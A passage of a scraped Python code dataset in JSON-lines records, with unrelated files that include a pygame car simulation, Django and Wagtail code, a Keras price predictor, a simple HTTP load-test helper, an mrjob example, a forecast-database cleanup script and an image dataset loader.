else:\r\n # subtract velocity/time step (= acceleration), 
i.e. the net acceleration becomes 0 and the car stops\r\n car.linear_acceleration = -float(car.linear_velocity) / float(dt)\r\n \r\n # if any other key (or none) is pressed\r\n else:\r\n # if |velocity| exceeds (free deceleration x time step)\r\n if abs(car.linear_velocity) > dt * car.free_deceleration:\r\n # copysign(x, y): returns the magnitude of x with the sign of y\r\n # free (rolling-friction) deceleration applies, so the car slows gradually\r\n car.linear_acceleration = -copysign(car.free_deceleration, car.linear_velocity)\r\n # if |velocity| is below (free deceleration x time step)\r\n else:\r\n # if the time step is non-zero\r\n if dt != 0:\r\n # subtract velocity/time step (= acceleration), so the net acceleration becomes 0 and the car stops\r\n car.linear_acceleration = -float(car.linear_velocity) / float(dt)\r\n \r\n # clamp the acceleration to the range (-1000.0, 1000.0)\r\n car.linear_acceleration = max(-car.max_acceleration, min(car.linear_acceleration, car.max_acceleration))\r\n\r\n # if the right arrow key is pressed\r\n if pressed[pygame.K_RIGHT]:\r\n # steer right: subtract an angle of 30 x time step\r\n car.steering_angle -= 30 * dt\r\n \r\n # if the left arrow key is pressed\r\n elif pressed[pygame.K_LEFT]:\r\n # steer left: add an angle of 30 x time step\r\n car.steering_angle += 30 * dt\r\n \r\n # if no steering key is pressed\r\n else:\r\n # reset the steering angle to 0\r\n car.steering_angle = 0\r\n \r\n # clamp the steering angle to the range (-30, 30)\r\n car.steering_angle = max(-car.max_steering, min(car.steering_angle, car.max_steering))\r\n\r\n # update the car state every time step\r\n car.update(dt)\r\n\r\n # fill the screen background (black -> changed to white)\r\n screen.fill((255, 255, 255))\r\n\r\n # rotate the car image (car.png)\r\n rotated = pygame.transform.rotate(car_image, car.yaw)\r\n # rotate the stopped car image (added)\r\n rotated_stop = pygame.transform.rotate(car_image_stop, car_stop.yaw+180)\r\n\r\n # draw the car's trajectory (added)\r\n for i in range(len(car.Arr_x)):\r\n #car_xc = (car.Arr_x[i][0]+car.Arr_x[i][1])/2\r\n #car_yc = (car.Arr_y[i][0]+car.Arr_y[i][1])/2\r\n #pygame.draw.circle(screen, (255, 0, 0), [int(car_xc), int(car_yc)], 5)\r\n\r\n pygame.draw.line(screen, (0, 0, 255), [car.Arr_x[i][0], car.Arr_y[i][0]], [car.Arr_x[i][1],car.Arr_y[i][1]], 5)\r\n pygame.draw.line(screen, (0, 0, 255), [car.Arr_x[i][0], car.Arr_y[i][0]], [car.Arr_x[i][2],car.Arr_y[i][2]], 5)\r\n pygame.draw.line(screen, (0, 0, 255), [car.Arr_x[i][1], car.Arr_y[i][1]], [car.Arr_x[i][3],car.Arr_y[i][3]], 5)\r\n pygame.draw.line(screen, (0, 0, 255), [car.Arr_x[i][3], car.Arr_y[i][3]], [car.Arr_x[i][2],car.Arr_y[i][2]], 5)# modified 2->5\r\n\r\n # quit on collision (added)\r\n if car.Arr_y[i][0] < 230 and 170 < car.Arr_y[i][1] and car.Arr_x[i][0] < 1160 and 1030 < car.Arr_x[i][3]:\r\n print(\"충돌\")\r\n pygame.quit()\r\n\r\n # draw the car's path line (added) # modified\r\n for i in range(len(car.Arr_xl)):\r\n car_xc = (car.Arr_xl[i][0]+car.Arr_xl[i][1])/2# modified\r\n car_yc = (car.Arr_yl[i][0]+car.Arr_yl[i][1])/2# modified\r\n pygame.draw.circle(screen, (255, 0, 0), [int(car_xc), int(car_yc)], 3)# modified 5->3\r\n # draw a marker at the front of the stopped car (added)\r\n pygame.draw.circle(screen, (255,0,0), [1030, 200], 3)\r\n\r\n # draw the rotated car image at the computed position\r\n screen.blit(rotated, [car.car_img_x, car.car_img_y])\r\n # draw the stopped car image (added)\r\n screen.blit(rotated_stop, [car_stop.car_img_x_stop, car_stop.car_img_y_stop])\r\n\r\n # compute the distance between the two cars (added)\r\n dist = math.sqrt(pow(1030-(car_xc+130), 2) + pow(200-car_yc, 2))\r\n print(\"거리:\", dist)\r\n\r\n # refresh the display\r\n pygame.display.flip()\r\n\r\n# the while loop has exited, so quit the program\r\npygame.quit()\r\n","sub_path":"pygame_simul_carbody_crush.py","file_name":"pygame_simul_carbody_crush.py","file_ext":"py","file_size_in_byte":11730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"531812773","text":"from django.db import models\nfrom django.utils import 
timezone\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom rest_framework.authtoken.models import Token\nfrom django.conf import settings\n\n\nclass Assignment(models.Model):\n SUBJECT_CHOICES = (\n ('English', 'English'),\n ('Tamil', 'Tamil'),\n ('Maths', 'Maths'),\n ('Physics', 'Physics'),\n ('Chemistry', 'Chemistry'),\n ('Biology', 'Biology'),\n )\n id = models.AutoField(primary_key=True)\n title = models.CharField(max_length=100)\n content = models.TextField()\n staff = models.CharField(max_length=100)\n date_posted = models.DateTimeField(default=timezone.now)\n due_date = models.DateField()\n subject = models.CharField(max_length=10, choices=SUBJECT_CHOICES)\n\n def __str__(self):\n return self.title\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_auth_token(sender, instance=None, created=False, **kwargs):\n if created:\n Token.objects.create(user=instance)\n","sub_path":"assignment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"343918104","text":"import pandas as pd\nimport numpy as np\nimport os\nimport math\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error, accuracy_score\nfrom keras.models import model_from_json\nfrom keras.datasets import mnist\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.models import Sequential\nfrom keras import backend as K\n\ndef to_array_data(size):\n\n\tprice = []\n\tpredict = []\n\tn = 0\n\tn2 = 0\n\twhile n2 < size:\n\t\tprice.append([])\n\t\tpredict.append([])\n\t\tpredict[n2].append(hist['High'][n2] / 100000)\n\t\tpredict[n2].append(hist['Close'][n2] / 100000)\n\t\tpredict[n2].append(hist['Open'][n2] / 100000)\n\t\tpredict[n2].append(hist['Low'][n2] / 100000)\n\t\tn = 1\n\t\twhile n < 31:\n\t\t\tprice[n2].append(hist['High'][n + n2]/ 100000)\n\t\t\tprice[n2].append(hist['Close'][n + n2]/ 100000)\n\t\t\tprice[n2].append(hist['Open'][n + n2]/ 100000)\n\t\t\tprice[n2].append(hist['Low'][n + n2]/ 100000)\n\t\t\tprice[n2].append(hist['Week'][n + n2] / 53)\n\t\t\tprice[n2].append(hist['Weekday'][n + n2] / 6)\n\t\t\tn = n + 1\n\t\tn2 = n2 + 1\n\tpredict = np.asarray(predict)\n\tprice = np.asarray(price)\n\treturn price, predict\n\n\nhist = pd.read_csv(\"./History.csv\")\nhist['Weekday'] = pd.DataFrame({'Weekday':[]})\nhist['Week'] = pd.DataFrame({'Week':[]})\nhist['Date'] = pd.to_datetime(hist['Date'])\nhist['Week'] = hist['Date'].dt.week\nhist['Weekday'] = hist['Date'].dt.weekday\n\nprice, predict = to_array_data(len(hist['Week']) - 30)\n\nmodel = Sequential()\nX_train, X_test, Y_train, Y_test = train_test_split(price, predict, test_size = 0.13)\n\nif os.path.exists(\"./model.json\") and os.path.exists(\"./model.h5\"):\n\tjson_file = open('model.json', 'r')\n\tloaded_model_json = json_file.read()\n\tjson_file.close()\n\tmodel = model_from_json(loaded_model_json)\n\tmodel.load_weights(\"model.h5\")\nelse:\n\tmodel.add(Dense(180, input_dim = 180, activation=\"relu\", kernel_initializer=\"normal\"))\n\tmodel.add(Dense(90, activation=\"relu\", kernel_initializer=\"normal\"))\n\tmodel.add(Dense(45, activation=\"relu\", kernel_initializer=\"normal\"))\n\tmodel.add(Dense(4, activation=\"relu\", kernel_initializer=\"normal\"))\n\nmodel.compile(loss=\"mean_squared_error\", metrics=[\"accuracy\"], 
optimizer=\"Adam\")\nprint(model.summary())\ny1 = input(\"Train model Y-Yes N-No: \")\nif (y1 == 'y' or y1 == 'Y'):\n\tmodel.fit(X_train, Y_train, epochs = 2667, verbose = 1)\nans = model.predict(X_test)\n\nprint(\"{:.3f}\".format(math.sqrt(mean_squared_error(Y_test, ans))))\n\nprice, predict = to_array_data(2)\n\nsize = 1\nans = model.predict(price)\nans = ans * 100000\npredict = predict * 100000\nprint('\tMust\t\tHave')\nwhile size >= 0:\n\tprint('High\t{0:.1f}\t\t{1:.1f}'.format(predict[size][0], ans[size][0]))\n\tprint('Close\t{0:.1f}\t\t{1:.1f}'.format(predict[size][1], ans[size][1]))\n\tprint('Open\t{0:.1f}\t\t{1:.1f}'.format(predict[size][2], ans[size][2]))\n\tprint('Low\t{0:.1f}\t\t{1:.1f}\\n'.format(predict[size][3], ans[size][3]))\n\tsize = size - 1\n\nif(y1 == 'y' or y1 == 'Y'):\n\tyn = input(\"Save Neuro Y-Yes N-No: \")\n\tif (yn == 'y' or yn == 'Y'):\n\t\tmodel_json = model.to_json()\n\t\twith open(\"model.json\", \"w\") as json_file:\n\t\t\tjson_file.write(model_json)\n\t\tmodel.save_weights(\"model.h5\")\nK.clear_session()\n# \tMust\t\tHave\n# High\t11501.4\t\t11416.0\n# Close\t11359.4\t\t11261.4\n# Open\t10903.4\t\t10901.7\n# Low\t10639.8\t\t10640.9\n\n# High\t11785.7\t\t11684.8\n# Close\t11259.4\t\t11372.7\n# Open\t11421.7\t\t11527.4\n# Low\t11057.4\t\t11083.7\n\n\n\n# price = []\n# predict = []\n# n = 0\n# n2 = 0\n# while n2 < 2:\n# \tprice.append([])\n# \tpredict.append([])\n# \tn = 0\n# \twhile n < 30:\n# \t\tprice[n2].append([])\n# \t\tprice[n2][n].append(hist['High'][n + n2])\n# \t\tprice[n2][n].append(hist['Close'][n + n2])\n# \t\tprice[n2][n].append(hist['Open'][n + n2])\n# \t\tprice[n2][n].append(hist['Low'][n + n2])\n# \t\tprice[n2][n].append(hist['Week'][n + n2])\n# \t\tprice[n2][n].append(hist['Weekday'][n + n2])\n# \t\tn = n + 1\n# \tpredict[n2].append(hist['High'][n + n2])\n# \tpredict[n2].append(hist['Close'][n + n2])\n# \tpredict[n2].append(hist['Open'][n + n2])\n# \tpredict[n2].append(hist['Low'][n + n2])\n# \tn2 = n2 + 1\n# print(price[0][0:2])\n# print(predict[0:2])\n\n# model = Sequential()\n# model.add(Conv2D(13, (6,6), input_shape = (30, 7, 1)))\n# model.add(Activation('relu'))\n# model.add(Conv2D(13, (2, 2)))\n# model.add(Activation('relu'))\n# model.add(MaxPooling2D(pool_size=(2, 2)))\n# model.add(Dropout(0.25))\n# model.add(Flatten())\n# model.add(Dense(64))\n# model.add(Activation('relu'))\n# model.add(Dense(4))\n# model.add(Activation('softmax'))\n# model.compile(loss='categorical_crossentropy', optimizer='adam')","sub_path":"btc.py","file_name":"btc.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"472498126","text":"# -*- coding:utf-8 -*-\nimport requests\nimport datetime\nimport time\nimport threading\nimport settings\n\n\nclass UrlRequest(object):\n\n def __init__(self):\n self.times = []\n self.error = []\n\n def get_resp(self, url,data):\n my_resp = UrlRequest()\n r = requests.get(url, headers=settings.API_HEADERS, data=data)\n\n # 获取响应时间,单位ms\n ResponseTime = float(r.elapsed.microseconds) / 1000\n # 将响应时间写入数组\n my_resp.times.append(ResponseTime)\n # 判断状态码\n if r.status_code != 200:\n my_resp.error.append(\"0\")\n\n\nclass Pressure(object):\n \"\"\"\n 压力测试\n \"\"\"\n\n def __init__(self,thread_number=None,think_time=0,url=None,data=None):\n self.thread_number = thread_number #并发线程数\n self.think_time = think_time #思考时间\n self.threads = []\n self.url = url\n self.data = data\n\n def start(self):\n url_request = UrlRequest()\n start_time = 
datetime.datetime.now()\n print(\"request start time %s\" % start_time)\n\n for i in range(1, self.thread_number + 1):\n t = threading.Thread(target=url_request.get_resp, args=(self.url,self.data))\n self.threads.append(t)\n\n for t in self.threads:\n time.sleep(self.think_time)\n # print the thread\n print(\"thread %s\" % t)\n t.setDaemon(True)\n t.start()\n t.join()\n\n end_time = datetime.datetime.now()\n print(\"request end time %s.\" % end_time)\n\n time.sleep(3)\n # compute the average of the list, keeping 3 decimal places\n AverageTime = \"{:.3f}\".format(float(sum(url_request.times)) / float(len(url_request.times)))\n # print the average response time\n print(\"Average Response Time %s ms\" % AverageTime)\n use_time = str(end_time - start_time)\n hour = use_time.split(':').pop(0)\n minute = use_time.split(':').pop(1)\n second = use_time.split(':').pop(2)\n # compute the total think time + request time\n total_time = float(hour) * 60 * 60 + float(minute) * 60 + float(second)\n # print the concurrency level\n print(\"Concurrent processing %s\" % self.thread_number)\n # print the total time used\n print(\"use total time %s s\" % (total_time - float(self.thread_number * self.think_time)))\n # print the number of failed requests\n print(\"fail request %s\" % url_request.error.count(\"0\"))","sub_path":"utilities/pressure_helper.py","file_name":"pressure_helper.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"559860539","text":"from keras.models import load_model\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nimport cv2\r\nimport random\r\n\r\nmodel = load_model(\"model_1.h5\")\r\n\r\ncap = cv2.VideoCapture(0) \r\ncap.set(3, 1280)\r\ncap.set(4, 720)\r\n\r\ndef bowl(n):\r\n    if n==0:\r\n        return 0\r\n    elif n==5:\r\n        return 4\r\n    else:\r\n        return 5\r\n\r\ndef bat(n):\r\n    return n\r\n\r\nstart = 0\r\n\r\nwhile True:\r\n    _, frame = cap.read()\r\n\r\n    # rectangle for user to play\r\n    cv2.rectangle(frame, (100, 100), (500, 500), (255, 255, 255), 2)\r\n    # rectangle for computer to play\r\n    cv2.rectangle(frame, (800, 100), (1200, 500), (255, 255, 255), 2)\r\n\r\n    # extract the region of image within the user rectangle\r\n    roi = frame[100:500, 100:500]\r\n    img = cv2.cvtColor(roi, cv2.COLOR_BGR2RGB)\r\n    img = cv2.resize(img, (64, 64))\r\n\r\n    pred = model.predict(np.array([img]))\r\n    ans = int(np.squeeze(np.dot(pred, [0, 1, 2, 3, 4, 5])))\r\n    font = cv2.FONT_HERSHEY_SIMPLEX\r\n    cv2.putText(frame, \"Your Move: \" + str(ans),\r\n                (50, 50), font, 1.2, (255, 255, 255), 2, cv2.LINE_AA)\r\n    cv2.putText(frame, \"Computer's Move: \" + str(bat(ans)),\r\n                (750, 50), font, 1.2, (255, 255, 255), 2, cv2.LINE_AA)\r\n    icon = cv2.imread(\r\n        \"images/{}.jpg\".format(bat(ans)))\r\n    icon = cv2.resize(icon, (400, 400))\r\n    frame[100:500, 800:1200] = icon\r\n    \r\n    cv2.imshow(\"frame\", frame)\r\n    k = cv2.waitKey(10)\r\n    if k == ord('q'):\r\n        break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","sub_path":"bat.py","file_name":"bat.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"498601700","text":"\"\"\"\nCommon base classes\n^^^^^^^^^^^^^^^^^^^\n\"\"\"\n# pylint: disable=too-few-public-methods,\nimport os\n\nfrom lxml.etree import tounicode\n\n\nclass ExtensionBase:\n    \"\"\"\n    Base class for extensions of the :py:class:`Ocs` entry point.\n    \"\"\"\n    def __init__(self, osc_obj):\n        self.osc = osc_obj\n\n\n# pylint: disable=too-many-instance-attributes\nclass DataDir:\n    \"\"\"\n    Compatibility layer for the ``.osc`` data directory used by the ``osc`` CLI\n    
\"\"\"\n data_dir = \".osc\"\n osclib_version_string = \"1.0\"\n\n # pylint: disable=too-many-arguments\n def __init__(self, osc, path, project, package=None, overwrite=False):\n self.osc = osc\n self.path = os.path.join(path, self.data_dir)\n self.project = project\n self.package = package\n self._apiurl = os.path.join(self.path, \"_apiurl\")\n self._project = os.path.join(self.path, \"_project\")\n self._package = os.path.join(self.path, \"_package\")\n self._files = os.path.join(self.path, \"_files\")\n self._osclib_version = os.path.join(self.path, \"_osclib_version\")\n if not os.path.isdir(self.path):\n os.makedirs(self.path)\n overwrite = True\n\n if overwrite:\n self.write_dir_contents()\n\n def write_dir_contents(self):\n \"\"\"\n Create files with default content in ``.osc`` sub-directory\n \"\"\"\n with open(self._apiurl, \"w\") as filehandle:\n filehandle.write(self.osc.url + os.linesep)\n\n with open(self._osclib_version, \"w\") as filehandle:\n filehandle.write(self.osclib_version_string + os.linesep)\n\n with open(self._project, \"w\") as filehandle:\n filehandle.write(self.project + os.linesep)\n\n if self.package:\n with open(self._package, \"w\") as filehandle:\n filehandle.write(self.package + os.linesep)\n\n with open(self._files, \"w\") as filehandle:\n filehandle.write(\n tounicode(self.osc.packages.get_files(self.project,\n self.package))\n )\n","sub_path":"osctiny/utils/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"60999996","text":"#!/usr/bin/env\n\"\"\"\n This example was adapted from the mrjob documentation:\n \n https://pythonhosted.org/mrjob/guides/quickstart.html\n\"\"\"\n\nfrom mrjob.job import MRJob\n\nclass MRWordFrequencyCount(MRJob):\n \n def mapper(self, _, line):\n ## remove whitespace from front and end of line\n line = line.strip()\n ## yield the length of the line (including spaces)\n yield \"chars\", len(line)\n # yield the number of words on the line\n yield \"words\", len(line.split())\n # yield the number of lines (always 1)\n yield \"lines\", 1\n \n def reducer(self, key, values):\n ## the reducer simply sums all the \"chars\", \"words\" and \"lines\" values\n yield key, sum(values)\n\n\nif __name__ == '__main__':\n MRWordFrequencyCount.run()\n","sub_path":"scripts/mrjob_ex1.py","file_name":"mrjob_ex1.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"359459572","text":"import ujson as json\nfrom scrapper.file.utils import smart_open\nfrom scrapper.commander import Commander\nfrom .utils import flatten\n\n\nclass Fields(Commander):\n scriptname = 'js.fields'\n\n @classmethod\n def setup_parser(cls, parser):\n parser.description = \"Extract all possible fields from the json file.\"\n parser.add_argument('input', nargs='?')\n parser.add_argument('-l', action='store_true', dest='use_line')\n\n @classmethod\n def initialize(cls, opts):\n return cls(opts.input, opts.use_line)\n\n def __init__(self, input_fname, use_line):\n self.input_fname = input_fname\n self.use_line = use_line\n self.fields = set()\n\n def run(self):\n with smart_open(self.input_fname, 'r') as f:\n for line in f:\n for field in flatten(json.loads(line)).keys():\n self.fields.add(field)\n delim = ' ' if self.use_line else '\\n'\n 
print(delim.join(sorted(self.fields)))","sub_path":"scrapper/js/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"540530094","text":"from django.views.generic import TemplateView\nfrom django.urls import reverse\nfrom django.conf import settings\n\nfrom home.models import BlogPage, get_all_tags\nfrom wagtail.search.models import Query\n\nfrom utils import get_paginated_pages\n\n\nclass SearchBlogView(TemplateView):\n template_name = \"search/search.html\"\n\n def get_context_data(self):\n search_query = self.request.GET.get('query', '')\n page = self.request.GET.get('page', 1)\n\n search_by_model = BlogPage\n return search(search_query, page, search_by_model)\n\n\ndef search(search_query, page, search_by_model):\n if search_query:\n search_results = search_by_model.objects.live().order_by(\n '-first_published_at').search(search_query.lower(),\n order_by_relevance=False)\n\n query = Query.get(search_query)\n # Record hit\n query.add_hit()\n else:\n search_results = search_by_model.objects.none()\n\n return {\n 'search_query': search_query,\n 'items': get_paginated_pages(\n page, search_results, settings.BLOG_POSTS_PER_PAGE),\n 'tags': get_all_tags(),\n 'add_url': reverse('search_blog')+'?query='+search_query.lower()+'&'\n }\n","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31575886","text":"\n# coding: utf-8\n\n# ## Personal implementation of sparse coding layer\n# \n# source: https://github.com/EderSantana/blog/blob/master/2015-08-02%20sparse%20coding%20with%20keras.ipynb\n\n# In[3]:\n\nget_ipython().magic(u'matplotlib inline')\nimport os\nimport numpy as np\nimport theano\nfrom scipy.io import loadmat\nimport matplotlib.pyplot as plt\n\nfrom keras.models import Sequential\nfrom keras.regularizers import l2\nfrom keras.optimizers import RMSprop\n\n\n# In[4]:\n\nclass SparseCoding(Layer):\n def __init__(self, input_dim, output_dim,\n init='glorot_uniform',\n activation='linear',\n truncate_gradient=-1,\n gamma=.1, # \n n_steps=10,\n batch_size=100,\n return_reconstruction=False,\n W_regularizer=l2(.01),\n activity_regularizer=None):\n \n super(SparseCoding, self).__init__()\n self.init = init\n \n self.A = self.init((self.output_dim, self.input_dim)) \n # contrary to a regular neural net layer, here \n # the output needs to have the same dimension\n # as the input we are modeling. 
Other layers would\n # have self.init((self.input_dim, self.output_dim))\n # as the dimensions of its adaptive coefficients.\n \n def get_output(self, train=False):\n s = self.get_input(train) # input data to be modeled\n initial_x = alloc_zeros_matrix(self.batch_size, self.output_dim) \n # initialize sparse codes with zeros.\n # Again note that the coefficients here got \n # output_dim as its last dimension because this \n # is a generative model.\n outputs, updates = theano.scan(\n self._step, # function operated in the main loop\n sequences=[], # iterable input sequences, we don't need this here\n outputs_info=[initial_x, ]*3 + [None, ], # initial states, \n # I'll explain why we have 4 initial states.\n non_sequences=[inputs, prior], # this is kept the same for the entire for loop\n n_steps=self.n_steps, # since sequences is empty, scan needs this \n # information to know when to stop\n truncate_gradient=self.truncate_gradient) # how much backpropagation \n # through time/iteration you need.\n if self.return_reconstruction:\n return outputs[-1][-1] # return the approximation of the input\n else:\n return outputs[0][-1] # return the sparse codes\n\n\n# In[ ]:\n\n\n\n","sub_path":"personal_sparse_coder.py","file_name":"personal_sparse_coder.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"381547499","text":"#!/home/uwcc-admin/curw_fcst_db_utils/venv/bin/python3\nimport traceback\nfrom datetime import datetime, timedelta\n\nfrom db_adapter.constants import set_db_config_file_path\nfrom db_adapter.constants import connection\nfrom db_adapter.base import get_Pool, destroy_Pool\nfrom db_adapter.curw_fcst.common import get_distinct_fgts_for_given_id, get_curw_fcst_hash_ids\nfrom db_adapter.curw_fcst.timeseries import Timeseries\n\n# from db_adapter.constants import CURW_FCST_USERNAME, CURW_FCST_PORT, CURW_FCST_PASSWORD, CURW_FCST_HOST, \\\n# CURW_FCST_DATABASE\n\nMIKE11_2016 = 26\n\n\ndef select_fgts_older_than_month(fgts):\n\n select_fgts = []\n\n deadline = datetime.now() - timedelta(days=30)\n\n for fgt in fgts:\n if fgt < deadline:\n select_fgts.append(fgt)\n\n return select_fgts\n\n\ndef flush_timeseries(pool, hash_ids):\n\n TS = Timeseries(pool=pool)\n\n ###################################################################################\n # delete a specific timeseries defined by a given hash id and fgt from data table #\n ###################################################################################\n count = 0\n for id in hash_ids:\n fgts = get_distinct_fgts_for_given_id(pool=pool, id_=id)\n\n outdated_fgts = select_fgts_older_than_month(fgts)\n count += 1\n for fgt in outdated_fgts:\n fgts.remove(fgt)\n TS.delete_timeseries(id_=id, fgt=fgt)\n print(count, id, fgt)\n\n TS.update_start_date(id_=id, start_date=min(fgts), force=True)\n\n print(\"{} of hash ids are deleted.\".format(count))\n\n\nif __name__==\"__main__\":\n\n try:\n\n set_db_config_file_path('/home/uwcc-admin/curw_fcst_db_utils/db_adapter_config.json')\n\n pool = get_Pool(host=connection.CURW_FCST_HOST, port=connection.CURW_FCST_PORT, user=connection.CURW_FCST_USERNAME,\n password=connection.CURW_FCST_PASSWORD, db=connection.CURW_FCST_DATABASE)\n\n # pool = get_Pool(host=CURW_FCST_HOST, port=CURW_FCST_PORT,\n # user=CURW_FCST_USERNAME, password=CURW_FCST_PASSWORD, db=CURW_FCST_DATABASE)\n\n source_list = [MIKE11_2016]\n\n for source in source_list:\n mike_hash_ids = get_curw_fcst_hash_ids(pool=pool, 
sim_tag=\"hourly_run\", source_id=source,\n variable_id=None, unit_id=None, station_id=None,\n start=None, end=None)\n\n if mike_hash_ids is not None and len(mike_hash_ids) > 0:\n flush_timeseries(pool=pool, hash_ids=mike_hash_ids)\n\n\n except Exception as e:\n print('An exception occurred.')\n traceback.print_exc()\n finally:\n print(\"Process finished\")\n destroy_Pool(pool=pool)\n","sub_path":"flush_data/flush_mike_hourly_run_outdated_data.py","file_name":"flush_mike_hourly_run_outdated_data.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"546562990","text":"import os\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom skimage import io, transform\nimport numpy as np\nimport skimage\nimport random\n#import imageio\nimport skimage.morphology as mpy\nfrom skimage.morphology import square\nrandom.seed(0)\nimport cv2\n\nclass CGI(Dataset):\n '''\n \tloading IIW data sets\n '''\n \n def __init__(self, dataFolder, albedoFolder, shadingFolder, normalFolder, maskFolder, fileListName, missingListName, transform=None):\n '''\n \tdataFolder: contains images\n \talbedoFolder: contains albedo\n \tshadingFolder: contains shading\n \tnormalFolder: contains normal information\n \tfileListName: all file names\n '''\n \n self.fileList = []\n with open(fileListName) as f:\n for line in f:\n self.fileList.append(line.strip())\n self.missingList = []\n with open(missingListName) as f:\n for line in f:\n self.missingList.append(line.strip())\n \n self.dataFolder = dataFolder\n self.albedoFolder = albedoFolder\n self.shadingFolder = shadingFolder\n self.normalFolder = normalFolder\n self.maskFolder = maskFolder\n self.transform = transform\n \n def __len__(self):\n return len(self.fileList)\n \n def __getitem__(self, idx):\n fileName = self.fileList[idx]\n\t\t# load image\n imgName = os.path.join(self.dataFolder, fileName + '_mlt.png')\n image = io.imread(imgName)\n if len(image.shape)==2:\n image = np.tile(image[...,None], (1, 3))\n image = np.float32(image)/255.0\n \n \n # load albedo\n albedoName = os.path.join(self.albedoFolder, fileName + '_mlt_albedo.png')\n albedo = io.imread(albedoName)\n if len(albedo.shape)==2:\n albedo = np.tile(albedo[...,None], (1, 3))\n albedo = np.float32(albedo)/255.0\n albedo[albedo < 1e-6] = 1e-6\n\n # --------------------------------------------------------------------\n # complicated code copied from CGI \n # I don't really think this block of code is totally correct\n # get shading and mask according to the code\n maskName = os.path.join(self.dataFolder, fileName + \"_mlt_mask.png\")\n mask = io.imread(maskName)\n mask = np.float32(mask)/255.0\n\n gt_R_gray = np.mean(albedo, 2)\n mask[gt_R_gray < 1e-6] = 0 \n mask[np.mean(image,2) < 1e-6] = 0\n mask = skimage.morphology.binary_erosion(mask, square(11))\n mask = np.expand_dims(mask, axis = 2)\n mask = np.repeat(mask, 3, axis= 2)\n albedo[albedo < 1e-6] = 1e-6\n\n rgb_img = image**2.2\n shading = rgb_img / albedo\n\n #mask[gt_S > 10] = 0 # CGI code this value is set to be 10, but I think it is wrong\n mask[shading > 20] = 0\n mask[shading < 1e-4] = 0\n\n shading[shading < 1e-4] = 1e-4\n shading[shading > 20] = 20\n\n if np.sum(mask) < 10:\n max_S = 1.0\n else:\n max_S = np.percentile(shading[mask > 0.5], 90)\n\n shading = shading/max_S\n mask = np.float32(np.abs(np.sum(mask, axis=2)/3.0 - 1.0)<1e-6)\n #------------------------------------------------------------------------\n\n \n ## shading saved as raw\n 
#shadingName = os.path.join(self.shadingFolder, fileName + '.tiff')\n #shading = imageio.imread(shadingName)\n #if len(shading.shape)==2:\n # shading = np.tile(shading[...,None], (1, 3))\n #shading = shading/20.0\n \n if fileName in self.missingList:\n # no normal\n imgHeight = image.shape[0]\n imgWidth = image.shape[1]\n normal = np.zeros((imgHeight, imgWidth, 3))\n normalMask = np.zeros((imgHeight, imgWidth))\n else:\n normalName = os.path.join(self.normalFolder, fileName + '_norm_camera.png')\n normal = io.imread(normalName)\n normalMaskName = os.path.join(self.normalFolder, fileName + '_valid.png')\n normalMask = io.imread(normalMaskName)\n\n \n if self.transform:\n image, albedo, shading, normal, mask, normalMask = \\\n self.transform([image, albedo, shading, normal, mask, normalMask])\n return image, albedo, shading, normal, mask, normalMask\n\nclass testTransfer(object):\n def __init__(self, output_size=64):\n # we need to think about this latter\n self.size=output_size\n def __call__(self, sample):\n # center crop\n image, albedo, shading, normal, mask, normalMask = sample\n\n # directly resize the image\n image = cv2.resize(image, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n albedo = cv2.resize(albedo, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n shading = cv2.resize(shading, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n normal = cv2.resize(normal, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n mask = cv2.resize(mask, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n mask = np.expand_dims(mask, axis=-1)\n normalMask = cv2.resize(normalMask, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n normalMask = np.expand_dims(normalMask, axis=-1)\n \n normal = normal.astype(np.float)\n normal = (normal/255.0-0.5)*2\n normal = normal/(np.linalg.norm(normal, axis=-1, keepdims=True) + 1e-6)\n mask = 1.0*mask/255.0\n normalMask = 1.0*normalMask/255.0\n #mask = mask*normalMask\n \n return image, albedo, shading, normal, mask, normalMask\n\n\nclass cropImg(object):\n '''\n randomly flip, resize and crop\n '''\n def __init__(self, output_size=256, maxSize=300):\n self.size = output_size\n self.maxSize = maxSize\n def __call__(self, sample):\n image, albedo, shading, normal, mask, normalMask= sample\n\n # randomly resize the image to 256 to 300 images\n imgSize = np.random.randint(self.size, self.maxSize)\n\n image = cv2.resize(image, (imgSize, 